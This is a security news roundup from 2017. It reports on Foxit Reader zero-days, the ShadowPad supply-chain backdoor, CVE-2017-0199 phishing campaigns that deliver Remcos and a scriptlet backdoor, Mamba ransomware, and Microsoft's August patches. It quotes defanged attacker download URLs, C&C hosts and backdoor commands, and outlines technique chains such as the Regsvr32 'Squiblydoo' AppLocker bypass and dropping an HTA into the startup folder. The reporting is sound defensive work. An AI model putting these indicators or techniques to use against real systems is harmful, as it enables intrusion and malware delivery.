Two Zero-Day vulnerabilities discovered in Foxit PDF reader

Security researchers have discovered two critical zero-day security vulnerabilities in Foxit PDF Reader that could allow attackers to execute arbitrary code on a targeted computer, if the Safe Reading Mode is not enabled.

The first vulnerability (CVE-2017-10951) is a command injection bug discovered by researcher Ariele Caltabiano, while the second bug (CVE-2017-10952) is a file write issue found by Security researcher Steven Seeley.

An attacker can exploit these bugs by sending a specially crafted PDF file to a Foxit user and leveraging them to open it.

Foxit refused to patch these vulnerabilities as they would not work with the “safe reading mode” feature that fortunately comes enabled by default in Foxit Reader however researchers believe building a mitigation doesn’t patch the vulnerabilities completely, which if remained unpatched, could be exploited if attackers find a way to bypass safe reading mode in the near future.

Both unpatched vulnerabilities can be triggered through the JavaScript API in Foxit Reader.

CVE-2017-10951: The command injection bug resides in an app.launchURL function that executes strings provided by attackers on the targeted system due to lack of proper validation, as demonstrated in the video given below.

CVE-2017-10952: This vulnerability exists within the “saveAs” JavaScript function that allows attackers to write an arbitrary file on a targeted system at any specific location, as demonstrated in the video given below.
“This vulnerability was exploited by embedding an HTA file in the document, then calling saveAS to write it to the startup folder, thus executing arbitrary VBScript code on startup,” reads the advisory published by the ZDI.
MITIGATION & PREVENTION
Ensure that you have the “Safe Reading Mode” feature enabled. Additionally, you can also uncheck the “Enable JavaScript Actions” from Foxit’s Preferences menu, although this may break some functionality.
Always be vigilant while opening any files they received via email like in the case of opening a malicious PowerPoint file which could compromise your computer with malware.

ShadowPad backdoor spreads through software update

Kaspersky lab discovered that attackers were able to modify the NetSarang software update to include a malware tracked as shadowpad backdoor.

Founded in 1997, NetSarang Computer, Inc. develops, markets and supports secure connectivity solutions and specializes in the development of server management tools for large corporate networks.

In July, researchers at Kaspersky Lab were investigating suspicious DNS requests in a partner’s network. The requests were found on systems used to process transactions in a customer’s network in the financial industry.

Further investigation into the DNS queries led them to NetSarang, that promptly sanitized its software update process by removing the malicious library nssock2.dll in its update package,

“In July 2017, during an investigation, suspicious DNS requests were identified in a partner’s network. The partner, which is a financial institution, discovered the requests originating on systems involved in the processing of financial transactions.” states the analysis published by Kaspersky.

The analysis showed that recent versions of software produced and distributed by NetSarang had been surreptitiously modified to include an encrypted payload that could be remotely activated by a knowledgeable attacker.

The backdoor was embedded into one of the code libraries used by the software (nssock2.dll):

170815-shadowpad-1
Disposition of the NSSOCK2.DLL binary with embedded malicious code

The attackers hid their malicious intent in several layers of encrypted code. The tiered architecture prevents the actual business logics of the backdoor from being activated until a special packet is received from the first tier command and control (C&C) server (“activation C&C server”). Until then, it only transfers basic information, including the computer, domain and user names, every 8 hours.

Activation of the payload would be triggered via a specially crafted DNS TXT record for a specific domain. The domain name is generated based on the current month and year values, e.g. for August 2017 the domain name used would be “nylalobghyhirgh.com”.

170815-shadowpad-2
Only when triggered by the first layer of C&C servers does the backdoor activate its second stage

The module performs a quick exchange with the controlling DNS server and provides basic target information (domain and user name, system date, network configuration) to the server. The C&C DNS server in return sends back the decryption key for the next stage of the code, effectively activating the backdoor.

analysis indicates the embedded code acts as a modular backdoor platform. It can download and execute arbitrary code provided from the C&C server, as well as maintain a virtual file system (VFS) inside the registry. The VFS, and any additional files created by the code, are encrypted and stored in a location unique to each victim.

Kaspersky Lab revealed that the first known compile date for the ShadowPad backdoor is Jul 13, hackers signed the malicious code with a legitimate NetSarang certificate.

 Kaspersky confirmed activated payload in a company in Hong Kong. Given that the NetSarang programs are used in hundreds of critical networks around the world, on servers and workstations belonging to system administrators, it is strongly recommended that companies take immediate action to identify and contain the compromised software.

Kaspersky published the list of Indicators of Compromise to help companies to check their systems.

 

New Malware Abuses PowerPoint Slide Show

In April Microsoft fixed the CVE-2017-0199  vulnerability in Office after threat actors had been exploiting it in the wild.The same vulnerability is now been found to be used hidden behind a specially crafted PowerPoint (PPSX) Presentation file.

CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents.

According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider and mainly targets companies involved in the electronics manufacturing industry.

Technical Analysis

The exploit arrives as a spear-phishing email attachment, purportedly from a cable manufacturing provider, that drops a remote access tool as its final payload.

Figure_02_spear-phishing-email

When the malicious PowerPoint Show is opened, it shows the text CVE-2017-8570, which is a different Microsoft Office vulnerability. However, based on our analysis, it actually exploits CVE-2017-0199 instead. This is a leftover mistake from the toolkit developer, which the sender did not choose to change.

The file triggers a script moniker in ppt/slides/_rels/slide1[.]xml[.]rels. The exploit runs the remote code at hxxp://192[.]166[.]218[.]230:3550/logo[.]doc, which is a VPN or hosting service that is abused by the attacker.

Figure_04_remote-malicious-code

If we run the sample, PowerPoint will initialize the script moniker and run the remote malicious payload via the PowerPoint Show animations feature.

Figure_06_ratman-exe

The logo.doc file is actually an XML file with JavaScript code that runs a PowerShell command to download and execute the file known as RATMAN.EXE (Detected by Trend Micro as BKDR_RESCOMS.CA). The executable is actually a trojanized version of the REMCOS remote access tool (RAT) from the Command & Control (C&C) server: hxxp://192[.]166[.]218[.]230:3550/ratman[.]exe, which is located in Poland. The 192[.]166[.]218[.]230address is also known to host other kinds of RATs. RATMAN.EXE then connects to the C&C server at 5[.]134[.]116[.]146:3550 for execution.

RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which when installed, allows attackers to control infected computers from its command-and-control server remotely.

Figure_07_remcos_rat_control_panel

Remcos is a legitimate and customizable remote access tool that allows users to control their system from anywhere in the world with some capabilities, like a download and execute the command, a keylogger, a screen logger, and recorders for both webcam and microphone.
Since the exploit is used to deliver infected Rich Text File (.RTF) documents, most detection methods for CVE-2017-0199 focuses on the RTF. So, the use of a new PPSX files allows attackers to evade antivirus detection as well.

The easiest way to prevent yourself completely from this attack is to download and apply patches released by Microsoft in April that will address the CVE-2017-0199 vulnerability.

Malicious Email campaign targets Russian-Speaking companies

A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system. The attack abuses various legitimate Windows components to run unauthorized scripts; this is meant to make detection and blocking more challenging, particularly by whitelisting-based solutions.

The campaign was discovered by Trend Micro that has been active for last 2 months and is targeting Russian-speaking firms.

The hackers leverage on many exploits and Windows components to run malicious scripts to avoid detection. The last sample associated with this attack was uploaded to VirusTotal on June 6, 2017 and experts at Trend Micro observed five spam campaigns running from June 23 to July 27, 2017.

201708-backdoor-email-1

The phishing messages are designed to appear as if they were sent from sales and billing departments and contain a weaponized Rich Text Format (RTF) file that exploits the CVE-2017-0199 flaw in Microsoft Office’s Windows Object Linking and Embedding (OLE) interface.

Their limited distribution and specificity in social engineering lures are red flags that may indicate they are a spear-phishing campaign.

Once the exploit code is executed, it downloads a fake Excel XLS file embedded with malicious JavaScript. When opened, the Excel header is ignored and the file is treated as an HTML Application file by the Windows component mshta.exe.

“The exploit code downloads what is supposedly an XLS file from  hxxps://wecloud[.]biz/m11[.]xls. This domain, to which all of the URLs used by this attack point to, is controlled by the attacker and was registered in early July.” states the analysis publiahed by Trend Micro.

“This fake Excel spreadsheet file is embedded with malicious JavaScript. The Excel header will actually be ignored and the file will be treated as an HTML Application file by mshta.exe, the Windows component that handles/opens HTA or HTML files.”

The JavaScript code calls the odbcconf.exe normal executable to run the DLL. Once executed, the DLL drops a SCT file (Windows scriptlet) in the %APPDATA% folder and appends the .TXT extension to it.

The DLL calls is used to power a Squiblydoo attack that leverages the Regsvr32 (Microsoft Register Server) to bypass restrictions on running scripts and evade application whitelisting protections such as AppLocker.

“This particular command uses the Regsvr32 (Microsoft Register Server) command-line utility, which is normally used to register and unregister OLE controls in the Windows registry, including DLL files. This attack method is also known as Squiblydoo—Regsvr32 is abused to bypass restrictions on running scripts.” continues the analysis. “It also means evading application white-listing protections such as AppLocker. While Squiblydoo is already a known attack vector, this is the first time we’ve seen it combined with odbcconf.exe.”

Next, the real backdoor is downloaded and executed, it is an XML file that is downloaded from the domain wecloud[.]biz. Also in this case, it is executed exploiting the same Regsvr32-abusing Squiblydoo attack technique.

The analysis states that “This is another SCT file with obfuscated JavaScript code that contains backdoor commands, which essentially allow attackers to take over an infected system.It tries to connect to it’s C&C server at hxxps://wecloud[.]biz/mail/ajax[.]php and retrieve tasks to carry out, some of which are:

  • d&exec = download and execute PE file
  • gtfo = delete files/startup entries and terminate
  • more_eggs = download additional/new scripts
  • more_onion = run new script and terminate current script
  • more_power = run command shell commands”

While the later stages of the infection chain required the use of various Windows components, the entry point still involves the use of a Microsoft Office exploit. Patching and keeping software up-to-date will protect users. Alternately, employing firewalls, intrusion detection and prevention systems, virtual patching, and URL categorization, as well as enforcing robust patch management policies, will significantly reduce the system’s attack surface.

 

Mamba ransomware is back, hitting organizations in Brazil and Saudi Arabia

Mamba was among the first samples of ransomware that encrypted hard drives rather than files that was detected in public attacks.Mamba leverages a disk-level encryption strategy instead of the conventional file-based one.

The first sample of Mamba Ransomware discovered in the wild were using a full disk encryption open source tool called DiskCryptor to strongly encrypt the data.

Researchers at Kaspersky Lab discovered a new wave of attack leveraging the Mamba ransomware that hit organizations in Brazil and Saudi Arabia.

“Authors of wiper malware are not able to decrypt victims’ machines. For example, if you remember the ExPetr [malware], it uses a randomly generated key to encrypt a victim machine, but the trojan doesn’t save the key for further decryption,” said Kaspersky Lab researcher Orkhan Memedov. “So, we have a reason to call it ‘a wiper.’ However, in case of Mamba the key should be passed to the trojan as a command line argument, it means that the criminal knows this key and, in theory, the criminal is able to decrypt the machine.”

Once the malware has infected a Windows machine, it overwrites the existing Master Boot Record, with a custom MBR and encrypts the hard drive using the DiskCryptor tool.

“Unfortunately there is no way to decrypt data that has been encrypted with the DiskCryptor utility, because this legitimate utility uses strong encryption algorithms,” explained Kaspersky Lab.

The last samples of Mamba ransomware show an unusual ransom note that instead of demanding for money like the original Mamba, it provides two email addresses and an ID number to be used to recover the encryption key.

The threat actor behind the new wave of Mamba ransomware attacks leverages the PSEXEC utility to execute the malware on the corporate network once it has penetrated it. PSEXEC is the same tool used by NotPetya to spread within target networks.

The attack chain described by Kaspersky has two phases:

Stage 1 (Preparation):

  • Create folder “C:\xampp\http
  • Drop DiskCryptor components into the folder
  • Install DiskCryptor driver
  • Register system service called DefragmentService
  • Reboot victim machine

Stage 2 (Encryption):

  • Setup bootloader to MBR and encrypt disk partitions using DiskCryptor software
  • Clean up
  • Reboot victim machine

The complete technical analysis can be found here.

“It is important to mention that for each machine in a victim’s network, the threat actor generates a password for the DiskCryptor utility,” Kaspersky Lab said in its report. “This password is passed via command line arguments to the ransomware dropper.”

Microsoft patches 25 critical vulnerabilities

Microsoft,as part of its August Patch Tuesday has released a large batch of 48 security updates consisting of 25 critical, 21 important and 2 moderate in severity for all supported versions Windows systems and other products.

These vulnerabilities impact various versions of Microsoft’s Windows operating systems, Internet Explorer, Microsoft Edge, Microsoft SharePoint, the Windows Subsystem for Linux, Adobe Flash Player, Windows Hyper-V and Microsoft SQL Server.

Some of these are:

CVE-2017-8620: Windows Search Remote Code Execution Vulnerability

This vulnerability affects all versions of Windows 7 and Windows 10, which could be used as a wormable attack like the one used in WannaCry ransomware, as it utilises the SMBv1 connection.
An attacker could remotely exploit the vulnerability through an SMB connection to elevate privileges and take control of the targeted Windows computer.
“A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,” Microsoft explains.

CVE-2017-8633: Windows Error Reporting Elevation of Privilege Vulnerability

Another elevation of privilege vulnerability resides in Windows Error Reporting (WER) that could allow an attacker to run a specially crafted application to gain access to administrator privileges on the targeted system to steal sensitive information.
“This update corrects the way the WER handles and executes files,” the advisory says.

CVE-2017-8627: Windows Subsystem for Linux DoS Vulnerability

Another important vulnerability is discovered in Windows Subsystem for Linux that could allow an attacker to execute code with elevated permissions.
“To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application. The security update addresses the vulnerability by correcting how Windows Subsystem for Linux handles NT pipes” the advisory says.
Successful exploitation eventually could allow denial of service attack, leaving the targeted system unresponsive.
Microsoft has released patches for all the vulnerabilities and users are advies to install them immediately.